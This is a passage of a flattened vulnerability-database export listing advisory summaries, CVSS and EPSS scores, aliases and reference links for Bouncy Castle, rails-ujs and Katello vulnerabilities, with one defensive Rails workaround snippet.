published_at 2026-04-09T12:55:00Z
2
value 0.00802
scoring_system epss
scoring_elements 0.74096
published_at 2026-04-12T12:55:00Z
3
value 0.00802
scoring_system epss
scoring_elements 0.7409
published_at 2026-04-13T12:55:00Z
4
value 0.00802
scoring_system epss
scoring_elements 0.74078
published_at 2026-04-08T12:55:00Z
5
value 0.00802
scoring_system epss
scoring_elements 0.74045
published_at 2026-04-07T12:55:00Z
6
value 0.00802
scoring_system epss
scoring_elements 0.74074
published_at 2026-04-04T12:55:00Z
7
value 0.00802
scoring_system epss
scoring_elements 0.74048
published_at 2026-04-02T12:55:00Z
8
value 0.00802
scoring_system epss
scoring_elements 0.74042
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-1000341
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000341
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000341
5
reference_url https://github.com/bcgit/bc-java
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java
6
reference_url https://github.com/bcgit/bc-java/commit/acaac81f96fec91ab45bd0412beaf9c3acd8defa
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/acaac81f96fec91ab45bd0412beaf9c3acd8defa
7
reference_url https://github.com/bcgit/bc-java/commit/acaac81f96fec91ab45bd0412beaf9c3acd8defa#diff-e75226a9ca49217a7276b29242ec59ce
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/acaac81f96fec91ab45bd0412beaf9c3acd8defa#diff-e75226a9ca49217a7276b29242ec59ce
8
reference_url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
9
reference_url https://security.netapp.com/advisory/ntap-20181127-0004
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20181127-0004
10
reference_url https://security.netapp.com/advisory/ntap-20181127-0004/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20181127-0004/
11
reference_url https://usn.ubuntu.com/3727-1
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3727-1
12
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1588708
reference_id 1588708
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1588708
14
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
15
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
16
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-1000341
reference_id CVE-2016-1000341
reference_type
scores
0
value 4.3
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:N/A:N
1
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-1000341
17
reference_url https://github.com/advisories/GHSA-r9ch-m4fh-fc7q
reference_id GHSA-r9ch-m4fh-fc7q
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-r9ch-m4fh-fc7q
18
reference_url https://usn.ubuntu.com/3727-1/
reference_id USN-3727-1
reference_type
scores
url https://usn.ubuntu.com/3727-1/
fixed_packages
aliases CVE-2016-1000341, GHSA-r9ch-m4fh-fc7q
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ddqw-aj7g-s7c2
36
url VCID-es1t-7196-4kbb
vulnerability_id VCID-es1t-7196-4kbb
summary 
CSRF Vulnerability in rails-ujs
There is a vulnerability in rails-ujs that allows attackers to send CSRF tokens to wrong domains.

Versions Affected:  rails <= 6.0.3
Not affected:       Applications which don't use rails-ujs.
Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1

Impact
------

This is a regression of CVE-2015-1840.

In the scenario where an attacker might be able to control the href attribute of an anchor tag or the action attribute of a form tag that will trigger a POST action, the attacker can set the href or action to a cross-origin URL, and the CSRF token will be sent.

Workarounds
-----------

To work around this problem, change code that allows users to control the href attribute of an anchor tag or the action attribute of a form tag to filter the user parameters.

For example, code like this:

    link_to params

to code like this:

    link_to filtered_params

    def filtered_params
      # Filter just the parameters that you trust
    end
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8167.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8167.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8167
reference_id
reference_type
scores
0
value 0.00592
scoring_system epss
scoring_elements 0.69242
published_at 2026-04-13T12:55:00Z
1
value 0.00592
scoring_system epss
scoring_elements 0.69177
published_at 2026-04-01T12:55:00Z
2
value 0.00592
scoring_system epss
scoring_elements 0.69192
published_at 2026-04-02T12:55:00Z
3
value 0.00592
scoring_system epss
scoring_elements 0.69213
published_at 2026-04-04T12:55:00Z
4
value 0.00592
scoring_system epss
scoring_elements 0.69195
published_at 2026-04-07T12:55:00Z
5
value 0.00592
scoring_system epss
scoring_elements 0.69245
published_at 2026-04-08T12:55:00Z
6
value 0.00592
scoring_system epss
scoring_elements 0.69263
published_at 2026-04-09T12:55:00Z
7
value 0.00592
scoring_system epss
scoring_elements 0.69285
published_at 2026-04-11T12:55:00Z
8
value 0.00592
scoring_system epss
scoring_elements 0.69271
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8167
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
5
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
6
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
7
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
8
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
9
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-8167.yml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-8167.yml
10
reference_url https://groups.google.com/forum/#!topic/rubyonrails-security/x9DixQDG9a0
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements
1
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!topic/rubyonrails-security/x9DixQDG9a0
11
reference_url https://groups.google.com/g/rubyonrails-security/c/x9DixQDG9a0
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://groups.google.com/g/rubyonrails-security/c/x9DixQDG9a0
12
reference_url https://hackerone.com/reports/189878
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://hackerone.com/reports/189878
13
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-8167
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-8167
14
reference_url https://www.debian.org/security/2020/dsa-4766
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2020/dsa-4766
15
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1843084
reference_id 1843084
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1843084
16
reference_url https://github.com/advisories/GHSA-xq5j-gw7f-jgj8
reference_id GHSA-xq5j-gw7f-jgj8
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xq5j-gw7f-jgj8
17
reference_url https://access.redhat.com/errata/RHSA-2021:1313
reference_id RHSA-2021:1313
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1313
fixed_packages
aliases CVE-2020-8167, GHSA-xq5j-gw7f-jgj8
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-es1t-7196-4kbb
37
url VCID-f4qa-9fn6-97az
vulnerability_id VCID-f4qa-9fn6-97az
summary In the Bouncy Castle JCE Provider version 1.55 and earlier ECDSA does not fully validate ASN.1 encoding of signature on verification. It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2669
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2669
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000342.json
reference_id
reference_type
scores
0
value 5.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000342.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-1000342
reference_id
reference_type
scores
0
value 0.00471
scoring_system epss
scoring_elements 0.64634
published_at 2026-04-11T12:55:00Z
1
value 0.00471
scoring_system epss
scoring_elements 0.64616
published_at 2026-04-09T12:55:00Z
2
value 0.00471
scoring_system epss
scoring_elements 0.64621
published_at 2026-04-12T12:55:00Z
3
value 0.00471
scoring_system epss
scoring_elements 0.64551
published_at 2026-04-07T12:55:00Z
4
value 0.00471
scoring_system epss
scoring_elements 0.64593
published_at 2026-04-13T12:55:00Z
5
value 0.00471
scoring_system epss
scoring_elements 0.64565
published_at 2026-04-02T12:55:00Z
6
value 0.00471
scoring_system epss
scoring_elements 0.64511
published_at 2026-04-01T12:55:00Z
7
value 0.00471
scoring_system epss
scoring_elements 0.646
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-1000342
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000342
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000342
5
reference_url https://github.com/bcgit/bc-java
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java
6
reference_url https://github.com/bcgit/bc-java/commit/843c2e60f67d71faf81d236f448ebbe56c62c647
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/843c2e60f67d71faf81d236f448ebbe56c62c647
7
reference_url https://github.com/bcgit/bc-java/commit/843c2e60f67d71faf81d236f448ebbe56c62c647#diff-25c3c78db788365f36839b3f2d3016b9
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/843c2e60f67d71faf81d236f448ebbe56c62c647#diff-25c3c78db788365f36839b3f2d3016b9
8
reference_url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
9
reference_url https://security.netapp.com/advisory/ntap-20181127-0004
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20181127-0004
10
reference_url https://security.netapp.com/advisory/ntap-20181127-0004/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20181127-0004/
11
reference_url https://usn.ubuntu.com/3727-1
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3727-1
12
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1588715
reference_id 1588715
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1588715
14
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
15
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
16
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-1000342
reference_id CVE-2016-1000342
reference_type
scores
0
value 5.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:N/I:P/A:N
1
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
2
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-1000342
17
reference_url https://github.com/advisories/GHSA-qcj7-g2j5-g7r3
reference_id GHSA-qcj7-g2j5-g7r3
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qcj7-g2j5-g7r3
18
reference_url https://usn.ubuntu.com/3727-1/
reference_id USN-3727-1
reference_type
scores
url https://usn.ubuntu.com/3727-1/
fixed_packages
aliases CVE-2016-1000342, GHSA-qcj7-g2j5-g7r3
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-f4qa-9fn6-97az
38
url VCID-f73y-mjrg-yfc9
vulnerability_id VCID-f73y-mjrg-yfc9
summary In the Bouncy Castle JCE Provider version 1.55 and earlier the DHIES implementation allowed the use of ECB mode. This mode is regarded as unsafe and support for it has been removed from the provider.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2669
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2669
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000344.json
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000344.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-1000344
reference_id
reference_type
scores
0
value 0.00388
scoring_system epss
scoring_elements 0.59912
published_at 2026-04-08T12:55:00Z
1
value 0.00388
scoring_system epss
scoring_elements 0.59862
published_at 2026-04-07T12:55:00Z
2
value 0.00388
scoring_system epss
scoring_elements 0.59892
published_at 2026-04-04T12:55:00Z
3
value 0.00388
scoring_system epss
scoring_elements 0.59867
published_at 2026-04-02T12:55:00Z
4
value 0.00388
scoring_system epss
scoring_elements 0.5979
published_at 2026-04-01T12:55:00Z
5
value 0.00388
scoring_system epss
scoring_elements 0.59913
published_at 2026-04-13T12:55:00Z
6
value 0.00388
scoring_system epss
scoring_elements 0.59932
published_at 2026-04-12T12:55:00Z
7
value 0.00388
scoring_system epss
scoring_elements 0.59947
published_at 2026-04-11T12:55:00Z
8
value 0.00388
scoring_system epss
scoring_elements 0.59926
published_at 2026-04-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-1000344
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000344
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000344
5
reference_url https://github.com/bcgit/bc-java/commit/9385b0ebd277724b167fe1d1456e3c112112be1f
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/9385b0ebd277724b167fe1d1456e3c112112be1f
6
reference_url https://security.netapp.com/advisory/ntap-20181127-0004
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20181127-0004
7
reference_url https://security.netapp.com/advisory/ntap-20181127-0004/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20181127-0004/
8
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1588314
reference_id 1588314
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1588314
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-1000344
reference_id CVE-2016-1000344
reference_type
scores
0
value 5.8
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:P/A:N
1
value 7.4
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
2
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-1000344
12
reference_url https://github.com/advisories/GHSA-2j2x-hx4g-2gf4
reference_id GHSA-2j2x-hx4g-2gf4
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-2j2x-hx4g-2gf4
fixed_packages
aliases CVE-2016-1000344, GHSA-2j2x-hx4g-2gf4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-f73y-mjrg-yfc9
39
url VCID-ftzy-9uny-byfb
vulnerability_id VCID-ftzy-9uny-byfb
summary 
Cross-site Scripting
A cross-site scripting (XSS) flaw was found in the katello component of Satellite. An attacker with privilege to create/edit organizations and locations is able to execute a XSS attacks against other users through the Subscriptions or the Red Hat Repositories wizards. This can possibly lead to malicious code execution and extraction of the anti-CSRF token of higher privileged users. Versions before `3.9.0` are vulnerable.
references
0
reference_url https://access.redhat.com/errata/RHSA-2019:1222
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3
scoring_elements
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1222
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-16887.json
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-16887.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-16887
reference_id
reference_type
scores
0
value 0.00346
scoring_system epss
scoring_elements 0.5715
published_at 2026-04-13T12:55:00Z
1
value 0.00346
scoring_system epss
scoring_elements 0.57033
published_at 2026-04-01T12:55:00Z
2
value 0.00346
scoring_system epss
scoring_elements 0.57127
published_at 2026-04-02T12:55:00Z
3
value 0.00346
scoring_system epss
scoring_elements 0.57149
published_at 2026-04-04T12:55:00Z
4
value 0.00346
scoring_system epss
scoring_elements 0.57126
published_at 2026-04-07T12:55:00Z
5
value 0.00346
scoring_system epss
scoring_elements 0.57177
published_at 2026-04-08T12:55:00Z
6
value 0.00346
scoring_system epss
scoring_elements 0.5718
published_at 2026-04-09T12:55:00Z
7
value 0.00346
scoring_system epss
scoring_elements 0.57191
published_at 2026-04-11T12:55:00Z
8
value 0.00346
scoring_system epss
scoring_elements 0.5717
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-16887
3
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-16887
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-16887
4
reference_url https://github.com/Katello/katello
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Katello/katello
5
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/katello/CVE-2018-16887.yml
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/katello/CVE-2018-16887.yml
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1645190
reference_id 1645190
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1645190
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite:6.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.0:*:*:*:*:*:*:*
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:theforeman:katello:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:theforeman:katello:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:theforeman:katello:*:*:*:*:*:*:*:*
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-16887
reference_id CVE-2018-16887
reference_type
scores
0
value 3.5
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:S/C:N/I:P/A:N
1
value 5.4
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
